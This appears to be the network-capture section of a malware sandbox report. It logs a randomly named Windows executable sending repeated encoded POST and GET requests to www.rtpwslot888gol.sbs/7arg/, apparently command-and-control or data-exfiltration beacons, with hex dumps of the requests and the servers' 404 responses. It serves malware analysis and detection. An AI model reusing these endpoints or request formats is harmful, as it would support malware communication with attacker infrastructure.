                                                                                  Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0;
                                                                                  Nov 13, 2024 15:37:17.605449915 CET212INData Raw: 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: ter; -ms-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap;
                                                                                  Nov 13, 2024 15:37:17.605459929 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0a 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0a 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 34 30
                                                                                  Data Ascii: -ms-flex-wrap: wrap; flex-wrap: wrap; max-width: 640px; margin: 20px auto; } @media screen and (min-width: 640px) { .lol-error-page__information { -webkit-flex-wrap: nowrap;
                                                                                  Nov 13, 2024 15:37:17.605539083 CET212INData Raw: 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 38 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 63 61 6c 63 28
                                                                                  Data Ascii: position: absolute; z-index: 1; bottom: -8px; left: calc(50% - 10px); display: block; width: 0; content: ''; border-width: 10px 8px 0; border-styl
                                                                                  Nov 13, 2024 15:37:17.605715990 CET1236INData Raw: 65 3a 20 73 6f 6c 69 64 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 66 63 33 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20
                                                                                  Data Ascii: e: solid; border-color: #fc3 transparent; } @media screen and (min-width: 640px) { .lol-error-page__information-balloon { -webkit-order: 1; -ms-flex-order: 1; order: 1; }
                                                                                  Nov 13, 2024 15:37:17.605729103 CET1236INData Raw: 64 2d 62 61 6e 6e 65 72 2d 68 6f 6c 69 7a 6f 6e 74 61 6c 2d 72 69 67 68 74 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e
                                                                                  Data Ascii: d-banner-holizontal-right { margin-left: 0; } @media screen and (min-width: 640px) { .lol-error-page__ad-banner-holizontal-right { margin-left: 20px; } } </style> <script type="text/j
                                                                                  Nov 13, 2024 15:37:17.605741024 CET1236INData Raw: 68 2e 37 31 38 63 31 37 2e 35 38 33 20 30 20 32 38 2e 31 2d 32 2e 38 34 35 20 33 33 2e 30 35 36 2d 38 2e 39 34 20 34 2e 39 35 36 2d 36 2e 30 39 35 20 33 2e 33 34 33 2d 31 34 2e 34 36 33 20 31 2e 37 31 36 2d 32 32 2e 34 35 35 7a 6d 2d 36 32 2e 32
                                                                                  Data Ascii: h.718c17.583 0 28.1-2.845 33.056-8.94 4.956-6.095 3.343-14.463 1.716-22.455zm-62.271-38.334c5.193-6.923 14.381-10.43 27.3-10.43h.314c12.974 0 22.058 3.582 26.936 10.535 2.787 4.183 4.285 9.091 4.31 14.117-4.045-13.545-15.289-21.356-31.774-21.4
                                                                                  Nov 13, 2024 15:37:17.606314898 CET636INData Raw: 33 2e 33 31 31 2d 2e 37 39 34 2e 34 37 36 2d 31 2e 32 35 37 2e 34 36 32 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 34 32 2e 38 33 32 20 38 39 2e 36 32 36 6c 39 2e 31 37 33 20 38 2e 38 20 39 2e 34 38 38 2d 38 2e
                                                                                  Data Ascii: 3.311-.794.476-1.257.462z"/><path fill="#fff" d="M42.832 89.626l9.173 8.8 9.488-8.726-2.634-21.476h-13.393z"/><path fill="#f60" d="M88.16 43.646c-1.061-2.641-3.633-4.362-6.48-4.335-.793-.06-1.59.001-2.364.181-.533-2.534-1.341-5.002-2.409-7.36-
                                                                                  Nov 13, 2024 15:37:17.606544018 CET1236INData Raw: 32 20 31 2e 38 33 37 2e 36 36 32 20 32 2e 38 31 33 2e 37 30 37 68 2e 37 33 33 63 32 2e 35 37 36 2e 31 34 32 20 35 2e 30 30 36 2d 31 2e 32 30 31 20 36 2e 32 35 35 2d 33 2e 34 35 38 20 31 2e 31 34 34 2d 32 2e 33 39 39 20 31 2e 37 34 36 2d 35 2e 30
                                                                                  Data Ascii: 2 1.837.662 2.813.707h.733c2.576.142 5.006-1.201 6.255-3.458 1.144-2.399 1.746-5.019 1.766-7.676.265-2.556-.016-5.139-.823-7.578zm-62.16 14.494c-.516.39-1.154.583-1.8.542-1.444.307-2.918-.373-3.621-1.671-.824-1.932-1.246-4.011-1.241-6.111-.389
                                                                                  Nov 13, 2024 15:37:17.612725973 CET1236INData Raw: 2d 31 33 2e 38 20 32 34 2e 32 34 32 2d 33 30 2e 31 39 31 2e 30 31 33 2d 34 2e 33 38 37 2d 2e 38 33 36 2d 38 2e 37 33 34 2d 32 2e 35 2d 31 32 2e 37 39 33 2d 31 32 2e 32 32 35 2e 34 30 37 2d 32 36 2e 39 33 35 2d 32 2e 36 39 34 2d 33 34 2e 33 34 32
                                                                                  Data Ascii: -13.8 24.242-30.191.013-4.387-.836-8.734-2.5-12.793-12.225.407-26.935-2.694-34.342-10.43z"/><path fill="#f60" d="M39.256 44.625c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.392 4.079 3.172 4.094 1.78.015 3.2-1.776 3.217-4.064.017-2.288-1.376-4.07


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  49192.168.2.550031188.114.96.3803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:37:22.965634108 CET718OUTPOST /7arg/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.rtpwslot888gol.sbs
                                                                                  Origin: http://www.rtpwslot888gol.sbs
                                                                                  Referer: http://www.rtpwslot888gol.sbs/7arg/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 2f 44 35 6c 74 51 71 56 6c 53 62 39 4b 66 57 77 39 58 4a 4f 69 46 75 61 70 58 38 58 33 32 68 77 45 4b 43 73 63 70 34 65 2f 53 6a 67 66 6e 4b 33 6e 78 4c 63 49 2f 57 2f 2f 65 52 58 55 50 59 6b 2b 55 6e 42 45 77 73 75 68 34 45 78 74 78 58 45 51 65 4e 4c 6f 34 2f 75 54 4c 78 74 2f 65 76 4f 62 55 4b 77 4a 4b 5a 74 4b 37 46 4d 36 31 34 51 53 6c 4c 2f 36 38 53 32 31 4f 46 63 5a 64 6d 49 48 6d 45 5a 6f 74 31 4a 34 69 67 33 39 74 6e 34 50 49 51 7a 6c 75 72 64 4e 56 36 66 67 71 49 57 6f 63 63 52 2b 43 63 47 35 69 6a 4d 59 42 46 4e 61 2b 63 6e 6a 78 44 64 5a 68 78 47 4b 53 49 62 43 65 5a 6b 5a 39 55 3d
                                                                                  Data Ascii: 2J=/D5ltQqVlSb9KfWw9XJOiFuapX8X32hwEKCscp4e/SjgfnK3nxLcI/W//eRXUPYk+UnBEwsuh4ExtxXEQeNLo4/uTLxt/evObUKwJKZtK7FM614QSlL/68S21OFcZdmIHmEZot1J4ig39tn4PIQzlurdNV6fgqIWoccR+CcG5ijMYBFNa+cnjxDdZhxGKSIbCeZkZ9U=
                                                                                  Nov 13, 2024 15:37:24.060480118 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:37:23 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3tA0dKiHcngbjM4J%2FoOvKisUDigbobik1ANvMdR6N%2F0%2BGUqbO%2FQIXDXTZTLf1QhZkrUO9i%2FCAYOZk1VMfIL%2F%2B0QbntCQ%2FAd%2FOh71geHsj8EV08i22Cawp5Kfwc7EXzNJU0dmq1Yo5%2FpM"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e1f7fe04ff02c9c-DFW
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1111&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=718&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 53 4d 6f db 30 0c bd 1b d8 7f 60 1c 14 d8 80 08 b6 5b 17 18 6c d9 d8 b0 0f ec b4 ed d0 cb 8e 8a 4d c7 44 64 c9 93 e8 24 5d d1 ff 5e c8 6e ba 66 d3 41 12 29 f2 f1 f1 81 92 ab cf 3f 3e dd fd fa f9 05 7a 1e 74 1d c9 70 80 e7 7b 8d 55 dc 23 ed 7a 2e b2 34 bd 8a c3 13 aa b6 8e e4 80 ac c0 a8 01 ab f8 40 78 1c ad e3 18 1a 6b 18 0d 57 f1 91 5a ee ab 16 0f d4 a0 98 8d 0d 90 21 26 a5 85 6f 94 c6 2a db 80 ef 1d 99 bd 60 2b 3a e2 ca d8 18 92 3a 92 4c ac b1 86 3c cd e1 bb 65 f8 6a 27 d3 be 89 64 b2 f8 e5 4c aa fe 30 60 4b 0a de 8e 0e 3b 74 5e 34 56 5b 27 7c d3 e3 80 45 ab dc fe dd c3 d6 b6 f7 0f 5b d5 ec 77 2e 40 2c 21 c5 3a 4d d3 15 0d 81 ae 32 fc f8 28 93 05 50 26 cf 7d 85 b4 73 e7 4b 0a ac f3 3c 2f 61 50 6e 47 a6 48 cb ce 1a 2e c0 58 37 28 0d 59 3e 9e 92 eb 74 3c c1 47 47 4a 6f e0 1b ea 03 32 35 6a 03 5e 19 2f 3c 3a ea 4a 78 25 62 09 ff b1 82 75 d7 75 65 50 b7 a5 c3 3f ba ab 89 6d 09 03 19 71 81 11 d7 10 d6 eb 04 c6 13 0b a5 69 67 0a
                                                                                  Data Ascii: 1edeSMo0`[lMDd$]^nfA)?>ztp{U#z.4@xkWZ!&o*`+::L<ej'dL0`K;t^4V['|E[w.@,!:M2(P&}sK</aPnGH.X7(Y>t<GGJo25j^/<:Jx%buueP?mqig
                                                                                  Nov 13, 2024 15:37:24.060596943 CET176INData Raw: 68 d0 30 ba 12 66 ed 8b f7 69 3a 9e ce 2d 08 8d 1d 17 20 f2 c5 39 5a 4f 4c d6 14 6a eb ad 9e 18 4b 60 3b 16 70 13 aa cc a1 b7 e9 55 e0 06 cf 4b f6 d9 b9 e2 8b 26 10 44 11 9e fe 60 91 dd ce b0 9a 0c be 30 5e 5c 73 cc 71 71 6d ad 6e cb b8 ce d3 5c
                                                                                  Data Ascii: h0fi:- 9ZOLjK`;pUK&D`0^\sqqmn\&}TA/4;/#9w=Co'=ct2l;[d#t{0_x%,0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  50192.168.2.550032188.114.96.3803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:37:25.513273954 CET738OUTPOST /7arg/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.rtpwslot888gol.sbs
                                                                                  Origin: http://www.rtpwslot888gol.sbs
                                                                                  Referer: http://www.rtpwslot888gol.sbs/7arg/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 2f 44 35 6c 74 51 71 56 6c 53 62 39 4c 38 2b 77 75 6b 78 4f 33 56 75 64 74 6e 38 58 39 57 67 35 45 4b 4f 73 63 6f 38 4f 2f 41 58 67 63 43 32 33 6d 79 54 63 45 66 57 2f 30 2b 52 57 4a 66 59 2f 2b 55 37 6e 45 77 67 75 68 34 51 78 74 30 7a 45 51 70 35 49 70 6f 2f 6f 49 37 78 76 79 2b 76 4f 62 55 4b 77 4a 4c 38 32 4b 37 39 4d 36 47 67 51 54 42 58 67 33 63 53 70 79 4f 46 63 54 39 6d 45 48 6d 46 4f 6f 73 70 6e 34 67 6f 33 39 74 33 34 50 64 38 77 77 65 72 66 51 6c 37 61 6e 70 77 54 6d 2b 49 48 35 52 70 5a 68 69 6a 4c 55 58 30 6e 41 63 55 50 77 52 76 6c 4a 79 35 78 62 69 70 79 59 39 4a 55 48 71 43 33 35 44 57 43 77 50 65 30 6f 68 62 39 45 44 63 56 2f 4b 73 6f
                                                                                  Data Ascii: 2J=/D5ltQqVlSb9L8+wukxO3Vudtn8X9Wg5EKOsco8O/AXgcC23myTcEfW/0+RWJfY/+U7nEwguh4Qxt0zEQp5Ipo/oI7xvy+vObUKwJL82K79M6GgQTBXg3cSpyOFcT9mEHmFOospn4go39t34Pd8wwerfQl7anpwTm+IH5RpZhijLUX0nAcUPwRvlJy5xbipyY9JUHqC35DWCwPe0ohb9EDcV/Kso
                                                                                  Nov 13, 2024 15:37:26.214452982 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:37:26 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rzt9uIbXS8%2BDuPqqeNXcUmct2f8cxML6dLJ2WpGJsvzry0gP%2Fuik%2BLbalOn2TzzxGK36pKPGR02D%2Brx6RXKEs5AnxfIXfbrOqhnGG38KExtAYkgExT87svrLNeHyzeNagjtxU2fHQJCO"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e1f7fedacf73aaf-DFW
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1073&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=738&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 53 4d 6f db 30 0c bd 1b d8 7f 60 1c 14 d8 80 08 b6 5b 17 18 6c d9 d8 b0 0f ec b4 ed d0 cb 8e 8a 4d c7 44 64 c9 93 e8 24 5d d1 ff 5e c8 6e ba 66 d3 41 12 29 f2 f1 f1 81 92 ab cf 3f 3e dd fd fa f9 05 7a 1e 74 1d c9 70 80 e7 7b 8d 55 dc 23 ed 7a 2e b2 34 bd 8a c3 13 aa b6 8e e4 80 ac c0 a8 01 ab f8 40 78 1c ad e3 18 1a 6b 18 0d 57 f1 91 5a ee ab 16 0f d4 a0 98 8d 0d 90 21 26 a5 85 6f 94 c6 2a db 80 ef 1d 99 bd 60 2b 3a e2 ca d8 18 92 3a 92 4c ac b1 86 3c cd e1 bb 65 f8 6a 27 d3 be 89 64 b2 f8 e5 4c aa fe 30 60 4b 0a de 8e 0e 3b 74 5e 34 56 5b 27 7c d3 e3 80 45 ab dc fe dd c3 d6 b6 f7 0f 5b d5 ec 77 2e 40 2c 21 c5 3a 4d d3 15 0d 81 ae 32 fc f8 28 93 05 50 26 cf 7d 85 b4 73 e7 4b 0a ac f3 3c 2f 61 50 6e 47 a6 48 cb ce 1a 2e c0 58 37 28 0d 59 3e 9e 92 eb 74 3c c1 47 47 4a 6f e0 1b ea 03 32 35 6a 03 5e 19 2f 3c 3a ea 4a 78 25 62 09 ff b1 82 75 d7 75 65 50 b7 a5 c3 3f ba ab 89 6d 09 03 19 71 81 11 d7 10 d6 eb 04 c6 13 0b a5 69 67 0a 68 d0 30 ba 12 66 ed 8b f7 [TRUNCATED]
                                                                                  Data Ascii: 1edeSMo0`[lMDd$]^nfA)?>ztp{U#z.4@xkWZ!&o*`+::L<ej'dL0`K;t^4V['|E[w.@,!:M2(P&}sK</aPnGH.X7(Y>t<GGJo25j^/<:Jx%buueP?mqigh0fi:
                                                                                  Nov 13, 2024 15:37:26.215521097 CET165INData Raw: 9e ce 2d 08 8d 1d 17 20 f2 c5 39 5a 4f 4c d6 14 6a eb ad 9e 18 4b 60 3b 16 70 13 aa cc a1 b7 e9 55 e0 06 cf 4b f6 d9 b9 e2 8b 26 10 44 11 9e fe 60 91 dd ce b0 9a 0c be 30 5e 5c 73 cc 71 71 6d ad 6e cb b8 ce d3 5c 26 7d 16 c6 ea fa 12 54 04 12 41
                                                                                  Data Ascii: - 9ZOLjK`;pUK&D`0^\sqqmn\&}TA/4;/#9w=Co'=ct2l;[d#t{0_x%,0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  51192.168.2.550033188.114.96.3803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:37:28.225199938 CET1755OUTPOST /7arg/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.rtpwslot888gol.sbs
                                                                                  Origin: http://www.rtpwslot888gol.sbs
                                                                                  Referer: http://www.rtpwslot888gol.sbs/7arg/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 2f 44 35 6c 74 51 71 56 6c 53 62 39 4c 38 2b 77 75 6b 78 4f 33 56 75 64 74 6e 38 58 39 57 67 35 45 4b 4f 73 63 6f 38 4f 2f 41 76 67 66 77 75 33 6e 54 54 63 4b 2f 57 2f 71 4f 52 4c 4a 66 5a 76 2b 55 6a 6a 45 77 64 62 68 36 6f 78 73 58 4c 45 63 4d 56 49 6d 6f 2f 6f 41 62 78 73 2f 65 76 58 62 51 75 30 4a 4c 73 32 4b 37 39 4d 36 42 59 51 55 56 4c 67 31 63 53 32 31 4f 46 51 5a 64 6e 54 48 6d 63 37 6f 73 74 5a 34 55 6b 33 7a 70 72 34 4e 76 6b 77 79 2b 72 52 52 6c 37 38 6e 6f 4e 44 6d 2b 45 4c 35 51 64 2f 68 67 6a 4c 52 6a 35 78 64 63 67 76 75 6a 4c 53 4d 43 64 56 62 53 35 2b 51 38 34 37 61 62 2b 73 34 43 57 33 6d 37 65 4c 6b 7a 4f 70 66 53 67 6f 74 75 51 38 2b 4a 71 6e 6e 52 74 66 78 50 77 4c 50 6d 75 58 64 74 46 39 43 66 73 4f 72 56 4a 67 62 70 69 2f 56 65 4c 6c 38 4c 41 48 30 39 4f 6d 7a 44 6b 73 57 72 31 6a 33 75 76 78 68 4c 4c 2f 52 56 62 61 42 4d 6a 68 59 6a 41 6b 4b 4b 46 30 6e 37 66 47 44 4b 78 66 54 50 55 6d 6e 79 4e 73 73 43 77 2b 62 6d 68 30 79 71 61 67 6f 4d 69 57 63 2f 68 4d 47 4c 48 [TRUNCATED]
                                                                                  Data Ascii: 2J=/D5ltQqVlSb9L8+wukxO3Vudtn8X9Wg5EKOsco8O/Avgfwu3nTTcK/W/qORLJfZv+UjjEwdbh6oxsXLEcMVImo/oAbxs/evXbQu0JLs2K79M6BYQUVLg1cS21OFQZdnTHmc7ostZ4Uk3zpr4Nvkwy+rRRl78noNDm+EL5Qd/hgjLRj5xdcgvujLSMCdVbS5+Q847ab+s4CW3m7eLkzOpfSgotuQ8+JqnnRtfxPwLPmuXdtF9CfsOrVJgbpi/VeLl8LAH09OmzDksWr1j3uvxhLL/RVbaBMjhYjAkKKF0n7fGDKxfTPUmnyNssCw+bmh0yqagoMiWc/hMGLHkhDcX8MNuk5h/SfD4elXFaHL1SCUTEPE/rMfZ72cQKQeRH0HeErFpMXYnPYpNSIxxl1t3AweQUYfHW2p0Smy9i3SIkQska/wa+QFX15K50vTTgbcHDhjzDn8OGBelVxZGDH6xeOqAk7RfWY69GZ/JhF1c/Fq9dyzZNl348pcW997qHrc81CEkArotCg9BVyv4Q1RqRQgCI+vEdMeSAoC8Gv6QRtCCcNhWY7LcSm56prJC4gLU2+yzV0NM88z5Wy/w6f4xaZZlgvXvXGggJmTBKwKbbtzsx+AVxsq/5wp3odID9gurjS45ZOVDA2CtEKG7kzI1qPck5vC4LmmwlWgvn+Sw9hbwWSNIvkR9OrmYk5+KSQvaCinwwi7ZIwLaO/COtLK6fj7QB9ELXLcQ8acHk8/byLrsqad1ON3MO0Ox3J68XMeq5snvcY5Z395syLR2S4Ww81V9v3r31yokgE/PR+Yf9IqmBfpofq1Bj9z1d/kb0S4II/1OzNYkRBzS4A6F8AYBmNsTlWjrFlmtcf8o2TJYBn7FxNj1cYoN3CnfuFzouDcHWpnQFJ+R4iBGJLkNL54usxFaOYqXVynLGjYMTpQkOwfDgDgZ0somsbM5tm4iZeMxbOhtB3zEmnt9J+1dBGvyGfvixFa/Ej+jJ+5R228NsFGPZufNc [TRUNCATED]
                                                                                  Nov 13, 2024 15:37:28.802875996 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:37:28 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pd2RvSQ%2FhDFu%2FxyV56mUce1wlGyxL1sc8xhrbRBLgYjS6RgigIGgfmd%2FV%2B2n8CHRVu9YAFir%2BAKaE5PxXhgFuiB%2BZ6%2FSwLrcmwhXm0xjj5Y2UDTxlvxUA%2Br2rJq6HWuQzjb0Bi82sjSR"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e1f7ffdfa6f6b58-DFW
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1247&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1755&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 31 66 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 65 53 4d 6f db 30 0c bd 1b d8 7f 60 1c 14 d8 80 08 b6 5b 17 18 6c d9 d8 b0 0f ec b4 ed d0 cb 8e 8a 4d c7 44 64 c9 93 e8 24 5d d1 ff 5e c8 6e ba 66 d3 41 12 29 f2 f1 f1 81 92 ab cf 3f 3e dd fd fa f9 05 7a 1e 74 1d c9 70 80 e7 7b 8d 55 dc 23 ed 7a 2e b2 34 bd 8a c3 13 aa b6 8e e4 80 ac c0 a8 01 ab f8 40 78 1c ad e3 18 1a 6b 18 0d 57 f1 91 5a ee ab 16 0f d4 a0 98 8d 0d 90 21 26 a5 85 6f 94 c6 2a db 80 ef 1d 99 bd 60 2b 3a e2 ca d8 18 92 3a 92 4c ac b1 86 3c cd e1 bb 65 f8 6a 27 d3 be 89 64 b2 f8 e5 4c aa fe 30 60 4b 0a de 8e 0e 3b 74 5e 34 56 5b 27 7c d3 e3 80 45 ab dc fe dd c3 d6 b6 f7 0f 5b d5 ec 77 2e 40 2c 21 c5 3a 4d d3 15 0d 81 ae 32 fc f8 28 93 05 50 26 cf 7d 85 b4 73 e7 4b 0a ac f3 3c 2f 61 50 6e 47 a6 48 cb ce 1a 2e c0 58 37 28 0d 59 3e 9e 92 eb 74 3c c1 47 47 4a 6f e0 1b ea 03 32 35 6a 03 5e 19 2f 3c 3a ea 4a 78 25 62 09 ff b1 82 75 d7 75 65 50 b7 a5 c3 3f ba ab 89 6d 09 03 19 71 81 11 d7 10 d6 eb 04 c6 13 0b a5
                                                                                  Data Ascii: 1f2eSMo0`[lMDd$]^nfA)?>ztp{U#z.4@xkWZ!&o*`+::L<ej'dL0`K;t^4V['|E[w.@,!:M2(P&}sK</aPnGH.X7(Y>t<GGJo25j^/<:Jx%buueP?mq
                                                                                  Nov 13, 2024 15:37:28.802891016 CET174INData Raw: 69 67 0a 68 d0 30 ba 12 66 ed 8b f7 69 3a 9e ce 2d 08 8d 1d 17 20 f2 c5 39 5a 4f 4c d6 14 6a eb ad 9e 18 4b 60 3b 16 70 13 aa cc a1 b7 e9 55 e0 06 cf 4b f6 d9 b9 e2 8b 26 10 44 11 9e fe 60 91 dd ce b0 9a 0c be 30 5e 5c 73 cc 71 71 6d ad 6e cb b8
                                                                                  Data Ascii: igh0fi:- 9ZOLjK`;pUK&D`0^\sqqmn\&}TA/4;/#9w=Co'=ct2l;[d#t{0_x%,
                                                                                  Nov 13, 2024 15:37:28.802900076 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  52192.168.2.550034188.114.96.3803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:37:31.157788038 CET447OUTGET /7arg/?2J=yBRFulyn6SusKZ+jwFF1qQiDnRV1yVxCYcOxd6ADnBv0QCWFr3q/C42N2s59F8UA9Wb/HU1T/Yso8my7bN9/45XMMrsG9LzPDXPeB6BMAupShH8CXHTl1JaA/+QsUvuMTg==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.rtpwslot888gol.sbs
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:37:31.485524893 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:37:31 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eRAqe8CMFAAfoRpV%2BtW7L08y28JxosKx912g6j7MoFd5RGvZjFn%2BWNnhsz8WuMj5cA2aHzxMnXuYW9ypP99eA9IffOskZC%2F%2BnWtucv5tsYXriXVs1P9gF0XexJVuH6wcWgKQhP5Wq3kN"}],"group":"cf-nel","max_age":604800}
